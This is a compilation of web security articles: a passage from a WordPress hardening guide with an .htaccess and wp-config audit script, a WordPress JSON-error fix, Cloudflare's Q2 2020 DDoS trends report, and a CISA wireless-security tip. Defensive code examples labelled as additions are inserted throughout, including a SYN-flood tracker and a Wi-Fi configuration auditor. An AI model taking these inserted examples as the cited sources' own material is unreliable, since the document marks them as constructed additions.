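def audit_htaccess(htaccess):
    text = _directives(htaccess)
    checks = [
        (r"^\s*Options\b[^\n]*-Indexes", "tip 5.2: directory listing not disabled (Options -Indexes)"),
        (r"<FilesMatch[^>]*wp-config", "tip 5.1: wp-config.php not blocked by a FilesMatch rule"),
        (r"<Files\s+xmlrpc\.php\s*>", "tip 5.4: xmlrpc.php not blocked"),
        (r"RewriteCond\s+%\{QUERY_STRING\}\s+\S*author=", "tip 5.5: author scans (?author=N) not blocked"),
    ]
    return [msg for pattern, msg in checks if not re.search(pattern, text, re.M | re.I)]


def audit(wp_config, htaccess):
    """All findings for one site, empty when every checked tip is in place."""
    return audit_wp_config(wp_config) + audit_htaccess(htaccess)


if __name__ == "__main__":
    for name, cfg, ht in (("weak", WEAK_WP_CONFIG, WEAK_HTACCESS),
                          ("hardened", HARDENED_WP_CONFIG, HARDENED_HTACCESS)):
        print(f"{name}: {audit(cfg, ht) or 'no findings'}")
```

Run it against real files by reading them into the two arguments; the .htaccess checks deliberately look only at uncommented directives, so a snippet that was pasted and then commented out during troubleshooting still shows up as missing.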

And there we have it. 14 in-depth tips to take your WordPress security to the next level and protect your site from most of the attacks that could be directed its way.

What do you feel about these tips to harden WordPress security, and how many have you implemented on your site? Let me know in the comments.

Please Note: This page contains affiliate links to products or services that are tried and tested by us. If you buy the product or service using our affiliate links, at no additional cost to you, it will help us to maintain this site and publish useful content regularly. Thank you.

Source :
https://wpbizblog.com/wordpress-security-guide/

How to Fix “the response is not a valid JSON response” Error in WordPress

You are creating content in the WordPress editor but the document fails to update. In fact, you see an error message that says “Updating failed. Error message: The response is not a valid JSON response.” Before you panic, let me assure you that this error can be resolved easily so you don’t lose your hard work.

Why does “the response is not a valid JSON response” error occur?

There could be multiple reasons why this error occurs. This post delves into each reason and offers multiple solutions to solve the problem.

Disable the Block editor and switch back to Classic editor

(Image: the WordPress Classic Editor)

The error “Updating failed. Error message: The response is not a valid JSON response.” is overwhelmingly seen in the new Block editor called Gutenberg.

The easiest way to resolve the updating error is by disabling Gutenberg and switching back to the Classic editor. As they say, old is Gold.

You can install the Classic Editor plugin for this. Once you have activated the plugin, try to save your posts. You should not see any error message now.

But what if you still want to use the block editor?

Nice question. It could be that reverting to the classic editor is not an option for you. In that case, you should follow what we are doing on PassionWP. With the classic editor plugin installed and activated, navigate to Settings>Writing.

Now select the Classic Editor as the “default editor for all users” option, save your changes, and clear your website cache. Right after this, select the Block Editor as the default editor and again save the changes.

(Image: Classic Editor plugin settings)

Now try editing an existing post or create a new post with the block editor. You should not encounter the JSON response error. However, it could be that the editor fails to automatically save your changes.

In this event, press Ctrl + S (Cmd + S for Mac) to manually save your changes. This solution works for us and we are using the block editor without encountering the JSON response error.

Mixed content error due to the use of SSL certificate

Another common reason for this error is the use of a Secure Sockets Layer (SSL) certificate (HTTPS) on your WordPress site. Using an SSL certificate can result in some content being delivered non-securely over HTTP even while the rest of the content is delivered securely over HTTPS.

This results in a mixed content error, in which both HTTP and HTTPS content is transmitted at the same time to the web browser, usually Google Chrome.
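What a “mixed content fixer” actually does, as an added example rather than code from the Really Simple SSL plugin: find the http:// sub-resource URLs in a page that is served over HTTPS and rewrite the ones that point at your own host. The HTML page and the host names are constructed; the list of tags and attributes that count as sub-resources is the usual browser behaviour (a plain link is navigation, not mixed content).

```python
"""Find and fix mixed content: http:// sub-resources in a page served over HTTPS.

Added example, not the Really Simple SSL plugin's code. The HTML page and
host names are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes a browser loads as sub-resources; an http:// value here is mixed
# content. A plain <a href> is navigation, not mixed content, so it is not listed.
SUBRESOURCE_ATTRS = {
    "img": ("src", "srcset"), "script": ("src",), "link": ("href",),
    "iframe": ("src",), "video": ("src", "poster"), "audio": ("src",),
    "source": ("src", "srcset"), "form": ("action",), "object": ("data",),
}

SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="http://example-blog.test/wp-content/themes/t/style.css">
<script src="https://cdn.example.test/app.js"></script>
</head><body>
<img src="http://example-blog.test/wp-content/uploads/logo.png" alt="logo">
<a href="http://example-blog.test/about/">About</a>
<iframe src="http://widgets.partner.test/embed"></iframe>
</body></html>
"""


class MixedContentFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (tag, attribute, url)

    def handle_starttag(self, tag, attrs):
        wanted = SUBRESOURCE_ATTRS.get(tag, ())
        for name, value in attrs:
            if name in wanted and value and value.lower().startswith("http://"):
                self.findings.append((tag, name, value))


def find_mixed_content(html):
    """Return every (tag, attribute, url) that a browser would flag as mixed content."""
    p = MixedContentFinder()
    p.feed(html)
    p.close()
    return p.findings


def fix_same_host(html, site_host):
    """Rewrite http:// sub-resource URLs that point at our own host to https://
    (what a 'mixed content fixer' does); third-party http:// URLs are left for
    manual review because the other site may not serve them over HTTPS."""
    fixed = html
    for _tag, _attr, url in find_mixed_content(html):
        if urlparse(url).hostname == site_host:
            fixed = fixed.replace(url, "https://" + url[len("http://"):])
    return fixed


if __name__ == "__main__":
    for tag, attr, url in find_mixed_content(SAMPLE_HTML):
        print(f"mixed content: <{tag} {attr}> {url}")
    left = find_mixed_content(fix_same_host(SAMPLE_HTML, "example-blog.test"))
    print("still needs review:", left)
```

The third-party iframe is the case a plugin cannot fix for you: only that site can decide to serve the resource over HTTPS, so it is reported rather than rewritten.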

How to solve the Mixed Content Error in WordPress?

We investigated the mixed content error and noticed that it is linked to the use of the Really Simple SSL plugin that is used by over 3 million WordPress users to configure https on their websites.

To resolve the “the response is not a valid JSON response” or mixed content error, navigate to Settings > SSL. This will open the plugin’s settings. Now click on the Settings tab.

You should do the following two things here:

  1. Ensure that the “Mixed content fixer” option is turned on. This prevents mixed content problems on your website that we discussed above.
  2. Next, you should turn on the “Use an alternative method to fix the mixed content” option. This will ensure that the “the response is not a valid JSON response” error does not appear while editing.

[Figure: Really Simple SSL settings]

After saving the changes, go back to the post you were working on and try saving your post or page. You should no longer experience the response is not a valid JSON response error.

Alternative solutions to the response is not a valid JSON response error

Deactivate all the plugins on your site and edit the content normally. If you’re using the Really Simple SSL plugin then deactivate this plugin first. Subsequently, try saving the document. If you are able to save it without facing any errors, re-activate the plugins one by one to check which plugin was causing the error.

There is another solution you can try to fix the response is not a valid JSON response error in WordPress.

Navigate to Settings > Permalinks. Change the permalink structure from post-name (or whatever the current structure is) to Plain, i.e. https://yoursite.com/?p=123. Now try saving your post/page. The problem should be resolved.

[Figure: WordPress permalinks settings]

But try this solution only if all other methods fail, as changing the permalinks causes significant SEO issues on a live website and you will also need to add multiple redirects.

We discussed 4 possible solutions to the response is not a valid JSON response error in WordPress. I hope one of these methods worked for you. If it did, let me know in the comments below. If it didn’t, post your specific problem so others can suggest different solutions.

Source :
https://wpbizblog.com/response-is-not-a-valid-json-response-error/

Network-layer DDoS attack trends for Q2 2020

In the first quarter of 2020, within a matter of weeks, our way of life shifted. We’ve become reliant on online services more than ever. Employees that can are working from home, students of all ages and grades are taking classes online, and we’ve redefined what it means to stay connected. The more the public is dependent on staying connected, the larger the potential reward for attackers to cause chaos and disrupt our way of life. It is therefore no surprise that in Q1 2020 (January 1, 2020 to March 31, 2020) we reported an increase in the number of attacks—especially after various government authority mandates to stay indoors—shelter-in-place went into effect in the second half of March.

In Q2 2020 (April 1, 2020 to June 30, 2020), this trend of increasing DDoS attacks continued and even accelerated:

  1. The number of L3/4 DDoS attacks observed over our network doubled compared to that in the first three months of the year.
  2. The scale of the largest L3/4 DDoS attacks increased significantly. In fact, we observed some of the largest attacks ever recorded over our network.
  3. We observed more attack vectors being deployed and attacks were more geographically distributed.

The number of global L3/4 DDoS attacks in Q2 doubled

Gatebot is Cloudflare’s primary DDoS protection system. It automatically detects and mitigates globally distributed DDoS attacks. A global DDoS attack is an attack that we observe in more than one of our edge data centers. These attacks are usually generated by sophisticated attackers employing botnets in the range of tens of thousands to millions of bots.

Sophisticated attackers kept Gatebot busy in Q2. The total number of global L3/4 DDoS attacks that Gatebot detected and mitigated in Q2 doubled quarter over quarter. In our Q1 DDoS report, we reported a spike in the number and size of attacks. We continue to see this trend accelerate through Q2; over 66% of all global DDoS attacks in 2020 occurred in the second quarter (nearly 100% increase). May was the busiest month in the first half of 2020, followed by June and April. Almost a third of all L3/4 DDoS attacks occurred in May.

In fact, 63% of all L3/4 DDoS attacks that peaked over 100 Gbps occurred in May. As the global pandemic continued to heighten around the world in May, attackers were especially eager to take down websites and other Internet properties.

Small attacks continue to dominate in numbers as big attacks get bigger in size

A DDoS attack’s strength is equivalent to its size—the actual number of packets or bits flooding the link to overwhelm the target. A ‘large’ DDoS attack refers to an attack that peaks at a high rate of Internet traffic. The rate can be measured in terms of packets or bits. Attacks with high bit rates attempt to saturate the Internet link, and attacks with high packet rates attempt to overwhelm the routers or other in-line hardware devices.

Similar to Q1, the majority of L3/4 DDoS attacks that we observed in Q2 were also relatively ‘small’ with regards to the scale of Cloudflare’s network. In Q2, nearly 90% of all L3/4 DDoS attacks that we saw peaked below 10 Gbps. Small attacks that peak below 10 Gbps can still easily cause an outage to most of the websites and Internet properties around the world if they are not protected by a cloud-based DDoS mitigation service.

Similarly, from a packet rate perspective, 76% of all L3/4 DDoS attacks in Q2 peaked up to 1 million packets per second (pps). Typically, a 1 Gbps Ethernet interface can deliver anywhere between 80k to 1.5M pps. Assuming the interface also serves legitimate traffic, and that most organizations have much less than a 1 Gbps interface, you can see how even these ‘small’ packet rate DDoS attacks can easily take down Internet properties.

In terms of duration, 83% of all attacks lasted between 30 to 60 minutes. We saw a similar trend in Q1 with 79% of attacks falling in the same duration range. This may seem like a short duration, but imagine this as a 30 to 60 minute cyber battle between your security team and the attackers. Now it doesn’t seem so short. Additionally, if a DDoS attack creates an outage or service degradation, the recovery time to reboot your appliances and relaunch your services can be much longer; costing you lost revenue and reputation for every minute.
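To show where the 80k to 1.5M pps figure for a 1 Gbps interface comes from, here is an added worked calculation (not from the Cloudflare report): it applies standard Ethernet framing overhead (8-byte preamble/SFD plus 12-byte inter-frame gap, which are my stated assumptions) to minimum- and maximum-size frames, then estimates what fraction of a link's packet budget an attack of a given packet rate consumes.

```python
"""Packets-per-second capacity of an Ethernet link versus an attack's packet rate.

Added example. The overhead constants are standard Ethernet values (assumed here),
not figures quoted in the report.
"""
from typing import Tuple

PREAMBLE_SFD = 8    # bytes sent on the wire before every frame
IFG = 12            # inter-frame gap, expressed in byte times
MIN_FRAME = 64      # smallest legal Ethernet frame; floods of bare SYNs are this size
MAX_FRAME = 1518    # largest standard (non-jumbo) frame


def link_max_pps(link_bps: float, frame_bytes: int) -> int:
    """Maximum frames per second when every frame on the link has frame_bytes payload+headers."""
    bits_per_frame = (frame_bytes + PREAMBLE_SFD + IFG) * 8
    return int(link_bps // bits_per_frame)


def pps_range(link_bps: float) -> Tuple[int, int]:
    """(lowest pps, with max-size frames; highest pps, with min-size frames) for a link."""
    return link_max_pps(link_bps, MAX_FRAME), link_max_pps(link_bps, MIN_FRAME)


def saturation(attack_pps: float, link_bps: float, frame_bytes: int = MIN_FRAME) -> float:
    """Fraction of the link's packet budget an attack consumes; >= 1.0 means the link is full.

    Small-frame attacks are the worst case for packet-processing capacity, so the
    default assumes minimum-size frames.
    """
    return attack_pps / link_max_pps(link_bps, frame_bytes)


if __name__ == "__main__":
    low, high = pps_range(1e9)
    print(f"1 GbE carries between {low:,} and {high:,} pps")          # roughly 81k to 1.49M
    print(f"1 Mpps of 64-byte packets fills {saturation(1e6, 1e9):.0%} of a 1 GbE link")
    print(f"... and {saturation(1e6, 100e6):.0%} of a 100 Mbps link")  # well over 100%
```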

In Q2, we saw the largest DDoS attacks on our network, ever

This quarter, we saw an increasing number of large scale attacks; both in terms of packet rate and bit rate. In fact, 88% of all DDoS attacks in 2020 that peaked above 100 Gbps were launched after shelter-in-place went into effect in March. Once again, May was not just the busiest month with the most number of attacks, but also the greatest number of large attacks above 100 Gbps.

From the packet perspective, June took the lead with a whopping 754 million pps attack. Besides that attack, the maximum packet rates stayed mostly consistent throughout the quarter with around 200 million pps.

The 754 million pps attack was automatically detected and mitigated by Cloudflare. The attack was part of an organized four-day campaign that lasted from June 18 to the 21. As part of the campaign, attack traffic from over 316,000 IP addresses targeted a single Cloudflare IP address.

Cloudflare’s DDoS protection systems automatically detected and mitigated the attack, and due to the size and global coverage of our network, there was no impact to performance. A global interconnected network is crucial when mitigating large attacks in order to be able to absorb the attack traffic and mitigate it close to the source, whilst also continuing serving legitimate customer traffic without inducing latency or service interruptions.

The United States is targeted with the most attacks

When we look at the L3/4 DDoS attack distribution by country, our data centers in the United States received the most number of attacks (22.6%), followed by Germany (4.4%), Canada (2.7%) and Great Britain (2.6%).

However, when we look at the total attack bytes mitigated by each Cloudflare data center, the United States still leads (34.9%), but it is followed by Hong Kong (6.6%), Russia (6.5%), Germany (4.5%) and Colombia (3.7%). The reason for this change is the total amount of bandwidth that was generated in each attack. For instance, while Hong Kong did not make the top 10 list by number of attacks, due to the relatively small number of attacks that were observed there (1.8%), those attacks were highly volumetric and generated so much attack traffic that it pushed Hong Kong into 2nd place.

When analyzing L3/4 DDoS attacks, we bucket the traffic by the Cloudflare edge data center locations and not by the location of the source IP. The reason is when attackers launch L3/4 attacks they can ‘spoof’ (alter) the source IP address in order to obfuscate the attack source. If we were to derive the country based on a spoofed source IP, we would get a spoofed country. Cloudflare is able to overcome the challenges of spoofed IPs by displaying the attack data by the location of Cloudflare’s data center in which the attack was observed. We’re able to achieve geographical accuracy in our report because we have data centers in over 200 cities around the world.

57% of all L3/4 DDoS attacks in Q2 were SYN floods

An attack vector is a term used to describe the attack method. In Q2, we observed an increase in the number of vectors used by attackers in L3/4 DDoS attacks. A total of 39 different types of attack vectors were used in Q2, compared to 34 in Q1. SYN floods formed the majority with over 57% in share, followed by RST (13%), UDP (7%), CLDAP (6%) and SSDP (3%) attacks.

SYN flood attacks aim to exploit the handshake process of a TCP connection. By repeatedly sending initial connection request packets with the synchronize flag (SYN) set, the attacker attempts to overwhelm the router’s connection table that tracks the state of TCP connections. The router replies with a synchronize-acknowledgment packet (SYN-ACK), allocates a certain amount of memory for each pending connection, and waits in vain for the client to respond with the final acknowledgment (ACK). Given a sufficient number of SYNs occupying the router’s memory, the router is unable to allocate further memory for legitimate clients, causing a denial of service.

No matter the attack vector, Cloudflare automatically detects and mitigates stateful or stateless DDoS attacks using our three-pronged protection approach, comprising our home-built DDoS protection systems:

  1. Gatebot – Cloudflare’s centralized DDoS protection system for detecting and mitigating globally distributed volumetric DDoS attacks. Gatebot runs in our network’s core data center. It receives samples from every one of our edge data centers, analyzes them and automatically sends mitigation instructions when attacks are detected. Gatebot also monitors the health of each customer’s web servers and triggers tailored protection accordingly.
  2. dosd (denial of service daemon) – Cloudflare’s decentralized DDoS protection systems. dosd runs autonomously in each server in every Cloudflare data center around the world, analyzes traffic, and applies local mitigation rules when needed. Besides being able to detect and mitigate attacks at super fast speeds, dosd significantly improves our network resilience by delegating the detection and mitigation capabilities to the edge.
  3. flowtrackd (flow tracking daemon) – Cloudflare’s TCP state tracking machine for detecting and mitigating the most randomized and sophisticated TCP-based DDoS attacks in unidirectional routing topologies. flowtrackd is able to identify the state of a TCP connection and then drops, challenges or rate-limits packets that don’t belong to a legitimate connection.
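The SYN flood mechanics described above and the connection-state tracking that flowtrackd is described as doing both come down to one idea: keep per-flow handshake state and treat packets that match no legitimate state as suspect. The following is an added illustration of that idea, not Cloudflare's code: a minimal tracker fed a constructed packet stream (one real handshake, one stray ACK, and a burst of spoofed SYNs), which drops packets with no matching flow and reports a SYN flood when SYNs pile up without handshakes completing. Packet records, thresholds and addresses are all my constructions.

```python
"""Minimal TCP handshake tracker with a SYN-flood indicator (added example, constructed data)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    ts: float
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # subset of "S", "A", "P", "R", "F", e.g. "SA" for SYN-ACK


# Constructed sample: a legitimate handshake to 198.51.100.10:443, a stray ACK with no
# handshake behind it, then 200 SYNs from spoofed sources that never complete.
SAMPLE = [
    Pkt(0.00, "203.0.113.5", 40000, "198.51.100.10", 443, "S"),
    Pkt(0.01, "198.51.100.10", 443, "203.0.113.5", 40000, "SA"),
    Pkt(0.02, "203.0.113.5", 40000, "198.51.100.10", 443, "A"),
    Pkt(0.03, "203.0.113.5", 40000, "198.51.100.10", 443, "PA"),
    Pkt(0.50, "192.0.2.77", 5555, "198.51.100.10", 443, "A"),
] + [Pkt(1.0 + i * 0.001, f"192.0.2.{i % 250 + 1}", 1024 + i, "198.51.100.10", 443, "S")
     for i in range(200)]


class FlowTracker:
    """Tracks handshake state per flow; half-open flows expire after a timeout."""

    def __init__(self, half_open_timeout: float = 3.0):
        self.state = {}      # flow key -> "SYN_SEEN" | "SYN_ACK_SEEN" | "ESTABLISHED"
        self.last_seen = {}  # flow key -> timestamp of last packet
        self.timeout = half_open_timeout
        self.counters = defaultdict(int)

    @staticmethod
    def key(p: Pkt):
        """Direction-independent key so both halves of a conversation share state."""
        a, b = (p.src, p.sport), (p.dst, p.dport)
        return (a, b) if a < b else (b, a)

    def expire(self, now: float) -> None:
        """Free table entries for half-open flows that never finished the handshake."""
        for k, t in list(self.last_seen.items()):
            if self.state[k] != "ESTABLISHED" and now - t > self.timeout:
                del self.state[k]
                del self.last_seen[k]

    def classify(self, p: Pkt) -> str:
        """Return 'pass' if the packet fits the flow's tracked state, else 'drop'."""
        self.expire(p.ts)
        k, st = self.key(p), self.state.get(self.key(p))
        if p.flags == "S":
            self.state[k], self.last_seen[k] = "SYN_SEEN", p.ts
            self.counters["syn"] += 1
            return "pass"
        if p.flags == "SA" and st == "SYN_SEEN":
            self.state[k], self.last_seen[k] = "SYN_ACK_SEEN", p.ts
            return "pass"
        if st == "SYN_ACK_SEEN" and "A" in p.flags:
            self.state[k], self.last_seen[k] = "ESTABLISHED", p.ts
            self.counters["established"] += 1
            return "pass"
        if st == "ESTABLISHED":
            self.last_seen[k] = p.ts
            return "pass"
        self.counters["orphan"] += 1  # no handshake behind this packet
        return "drop"

    def half_open(self) -> int:
        return sum(1 for s in self.state.values() if s != "ESTABLISHED")


def syn_flood_indicator(tr: FlowTracker, min_syns: int = 100, min_completion: float = 0.2) -> bool:
    """Flag a flood when many SYNs arrived but few handshakes completed."""
    syns = tr.counters["syn"]
    return syns >= min_syns and tr.counters["established"] / syns < min_completion


def run(packets):
    tr = FlowTracker()
    return tr, [tr.classify(p) for p in packets]
```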

In addition to our automated DDoS protection systems, Cloudflare also generates real-time threat intelligence that automatically mitigates attacks. Furthermore, Cloudflare provides its customers firewall, rate-limiting and additional tools to further customize and optimize their protection.

Cloudflare DDoS mitigation

As Internet usage continues to evolve for businesses and individuals, expect DDoS tactics to adapt as well. Cloudflare protects websites, applications, and entire networks from DDoS attacks of any size, kind, or level of sophistication.

Our customers and industry analysts recommend our comprehensive solution for three main reasons:

  1. Network scale: Cloudflare’s 37 Tbps network can easily block attacks of any size, type, or level of sophistication. The Cloudflare network has a DDoS mitigation capacity that is higher than the next four competitors—combined.
  2. Time-to-mitigation: Cloudflare mitigates most network layer attacks in under 10 seconds globally, and immediate mitigation (0 seconds) when static rules are preconfigured. With our global presence, Cloudflare mitigates attacks close to the source with minimal latency. In some cases, traffic is even faster than over the public Internet.
  3. Threat intelligence: Cloudflare’s DDoS mitigation is powered by threat intelligence harnessed from the over 27 million Internet properties on its network. Additionally, the threat intelligence is incorporated into customer-facing firewalls and tools in order to empower our customers.

Cloudflare is uniquely positioned to deliver DDoS mitigation with unparalleled scale, speed, and smarts because of the architecture of our network. Cloudflare’s network is like a fractal—every service runs on every server in every Cloudflare data center that spans over 200 cities globally. This enables Cloudflare to detect and mitigate attacks close to the source of origin, no matter the size, source, or type of attack.

To learn more about Cloudflare’s DDoS solution contact us or get started.

You can also join an upcoming live webinar where we will be discussing these trends, and strategies enterprises can implement to combat DDoS attacks and keep their networks online and fast.

Source :
https://blog.cloudflare.com/network-layer-ddos-attack-trends-for-q2-2020/

Securing Wireless Networks

In today’s connected world, almost everyone has at least one internet-connected device. With the number of these devices on the rise, it is important to implement a security strategy to minimize their potential for exploitation (see Securing the Internet of Things). Internet-connected devices may be used by nefarious entities to collect personal information, steal identities, compromise financial data, and silently listen to—or watch—users. Taking a few precautions in the configuration and use of your devices can help prevent this type of activity.

What are the risks to your wireless network?

Whether it’s a home or business network, the risks to an unsecured wireless network are the same. Some of the risks include:

Piggybacking

If you fail to secure your wireless network, anyone with a wireless-enabled computer in range of your access point can use your connection. The typical indoor broadcast range of an access point is 150–300 feet. Outdoors, this range may extend as far as 1,000 feet. So, if your neighborhood is closely settled, or if you live in an apartment or condominium, failure to secure your wireless network could open your internet connection to many unintended users. These users may be able to conduct illegal activity, monitor and capture your web traffic, or steal personal files.

Wardriving

Wardriving is a specific kind of piggybacking. The broadcast range of a wireless access point can make internet connections available outside your home, even as far away as your street. Savvy computer users know this, and some have made a hobby out of driving through cities and neighborhoods with a wireless-equipped computer—sometimes with a powerful antenna—searching for unsecured wireless networks. This practice is known as “wardriving.”

Evil Twin Attacks

In an evil twin attack, an adversary gathers information about a public network access point, then sets up their system to impersonate it. The adversary uses a broadcast signal stronger than the one generated by the legitimate access point; then, unsuspecting users connect using the stronger signal. Because the victim is connecting to the internet through the attacker’s system, it’s easy for the attacker to use specialized tools to read any data the victim sends over the internet. This data may include credit card numbers, username and password combinations, and other personal information. Always confirm the name and password of a public Wi-Fi hotspot prior to use. This will ensure you are connecting to a trusted access point.

Wireless Sniffing

Many public access points are not secured and the traffic they carry is not encrypted. This can put your sensitive communications or transactions at risk. Because your connection is being transmitted “in the clear,” malicious actors could use sniffing tools to obtain sensitive information such as passwords or credit card numbers. Ensure that all the access points you connect to use at least WPA2 encryption.

Unauthorized Computer Access

An unsecured public wireless network combined with unsecured file sharing could allow a malicious user to access any directories and files you have unintentionally made available for sharing. Ensure that when you connect your devices to public networks, you deny sharing files and folders. Only allow sharing on recognized home networks and only while it is necessary to share items. When not needed, ensure that file sharing is disabled. This will help prevent an unknown attacker from accessing your device’s files.

Shoulder Surfing

In public areas malicious actors can simply glance over your shoulder as you type. By simply watching you, they can steal sensitive or personal information. Screen protectors that prevent shoulder-surfers from seeing your device screen can be purchased for little money. For smaller devices, such as phones, be cognizant of your surroundings while viewing sensitive information or entering passwords.

Theft of Mobile Devices

Not all attackers rely on gaining access to your data via wireless means. By physically stealing your device, attackers could have unrestricted access to all of its data, as well as any connected cloud accounts. Taking measures to protect your devices from loss or theft is important, but should the worst happen, a little preparation may protect the data inside. Most mobile devices, including laptop computers, now have the ability to fully encrypt their stored data—making devices useless to attackers who cannot provide the proper password or personal identification number (PIN). In addition to encrypting device content, it is also advisable to configure your device’s applications to request login information before allowing access to any cloud-based information. Last, individually encrypt or password-protect files that contain personal or sensitive information. This will afford yet another layer of protection in the event an attacker is able to gain access to your device.

What can you do to minimize the risks to your wireless network?

  1. Change default passwords. Most network devices, including wireless access points, are pre-configured with default administrator passwords to simplify setup. These default passwords are easily available to obtain online, and so provide only marginal protection. Changing default passwords makes it harder for attackers to access a device. Use and periodic changing of complex passwords is your first line of defense in protecting your device. (See Choosing and Protecting Passwords.)
  2. Restrict access. Only allow authorized users to access your network. Each piece of hardware connected to a network has a media access control (MAC) address. You can restrict access to your network by filtering these MAC addresses. Consult your user documentation for specific information about enabling these features. You can also utilize the “guest” account, which is a widely used feature on many wireless routers. This feature allows you to grant wireless access to guests on a separate wireless channel with a separate password, while maintaining the privacy of your primary credentials.
  3. Encrypt the data on your network. Encrypting your wireless data prevents anyone who might be able to access your network from viewing it. There are several encryption protocols available to provide this protection. Wi-Fi Protected Access (WPA), WPA2, and WPA3 encrypt information being transmitted between wireless routers and wireless devices. WPA3 is currently the strongest encryption. WPA and WPA2 are still available; however, it is advisable to use equipment that specifically supports WPA3, as using the other protocols could leave your network open to exploitation.  
  4. Protect your Service Set Identifier (SSID). To prevent outsiders from easily accessing your network, avoid publicizing your SSID. All Wi-Fi routers allow users to protect their device’s SSID, which makes it more difficult for attackers to find a network. At the very least, change your SSID to something unique. Leaving it as the manufacturer’s default could allow a potential attacker to identify the type of router and possibly exploit any known vulnerabilities.
  5. Install a firewall. Consider installing a firewall directly on your wireless devices (a host-based firewall), as well as on your home network (a router- or modem-based firewall). Attackers who can directly tap into your wireless network may be able to circumvent your network firewall—a host-based firewall will add a layer of protection to the data on your computer (see Understanding Firewalls for Home and Small Office Use).
  6. Maintain antivirus software. Install antivirus software and keep your virus definitions up to date. Many antivirus programs also have additional features that detect or protect against spyware and adware (see Protecting Against Malicious Code and What is Cybersecurity?).
  7. Use file sharing with caution. File sharing between devices should be disabled when not needed. You should always choose to only allow file sharing over home or work networks, never on public networks. You may want to consider creating a dedicated directory for file sharing and restrict access to all other directories. In addition, you should password protect anything you share. Never open an entire hard drive for file sharing (see Choosing and Protecting Passwords).
  8. Keep your access point software patched and up to date. The manufacturer of your wireless access point will periodically release updates to and patches for a device’s software and firmware. Be sure to check the manufacturer’s website regularly for any updates or patches for your device.
  9. Check your internet provider’s or router manufacturer’s wireless security options. Your internet service provider and router manufacturer may provide information or resources to assist in securing your wireless network. Check the customer support area of their websites for specific suggestions or instructions.
  10. Connect using a Virtual Private Network (VPN). Many companies and organizations have a VPN. VPNs allow employees to connect securely to their network when away from the office. VPNs encrypt connections at the sending and receiving ends and keep out traffic that is not properly encrypted. If a VPN is available to you, make sure you log onto it any time you need to use a public wireless access point.
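Several of the items above (default passwords, MAC filtering, WPA3 over WPA/WPA2, a non-default and non-broadcast SSID) can be checked mechanically on an access point whose configuration is a text file. The following is an added example, not from the CISA tip: it audits a hostapd-style configuration, with a constructed out-of-the-box configuration shown beside a hardened one. The option names are hostapd's, which the tip does not mention; the default-SSID prefix list and the passphrase length threshold are my own choices.

```python
"""Audit a hostapd-style AP configuration against the wireless checklist (added example)."""
from typing import Dict, List

# Constructed: a typical out-of-the-box configuration (weak)
WEAK_CONF = """
interface=wlan0
ssid=NETGEAR42
wpa=1
wpa_passphrase=password
wpa_pairwise=TKIP
ignore_broadcast_ssid=0
"""

# Constructed: the same AP after applying the recommendations (WPA3/SAE, PMF, ACL)
HARDENED_CONF = """
interface=wlan0
ssid=kettle-of-fish-7
wpa=2
wpa_key_mgmt=SAE
sae_password=a-long-unique-passphrase-changed-from-default
rsn_pairwise=CCMP
ieee80211w=2
ignore_broadcast_ssid=1
macaddr_acl=1
accept_mac_file=/etc/hostapd/hostapd.accept
"""

# Constructed list of vendor-default SSID prefixes used for the "default SSID" check
DEFAULT_SSID_PREFIXES = ("NETGEAR", "LINKSYS", "TP-LINK", "DLINK", "ASUS")


def parse_conf(text: str) -> Dict[str, str]:
    """Parse key=value lines, ignoring blanks and comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            k, v = line.split("=", 1)
            conf[k.strip()] = v.strip()
    return conf


def audit(conf: Dict[str, str]) -> List[str]:
    """Return one finding per checklist item the configuration fails; empty means clean."""
    findings = []
    wpa = conf.get("wpa", "0")
    if wpa == "0":
        findings.append("open network: no WPA protection at all")
    elif wpa != "2":
        findings.append("WPA (version 1) enabled; use WPA2/WPA3 only")
    if "TKIP" in conf.get("wpa_pairwise", "") or "TKIP" in conf.get("rsn_pairwise", ""):
        findings.append("TKIP cipher allowed; require CCMP")
    if "SAE" not in conf.get("wpa_key_mgmt", ""):
        findings.append("WPA3 (SAE) not enabled")
    if conf.get("ieee80211w", "0") != "2":
        findings.append("management frame protection not required (WPA3 needs it)")
    ssid = conf.get("ssid", "")
    if ssid.upper().startswith(DEFAULT_SSID_PREFIXES):
        findings.append(f"SSID '{ssid}' looks like a manufacturer default")
    if conf.get("ignore_broadcast_ssid", "0") == "0":
        findings.append("SSID is broadcast")
    passphrase = conf.get("wpa_passphrase") or conf.get("sae_password", "")
    if len(passphrase) < 12 or passphrase.lower() in ("password", "admin"):
        findings.append("passphrase is short or a common default")
    if conf.get("macaddr_acl", "0") == "0":
        findings.append("no MAC address allow-list configured")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(parse_conf(text)) or ["no findings"])
```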

Authors

CISA

Source :
https://us-cert.cisa.gov/ncas/tips/ST05-003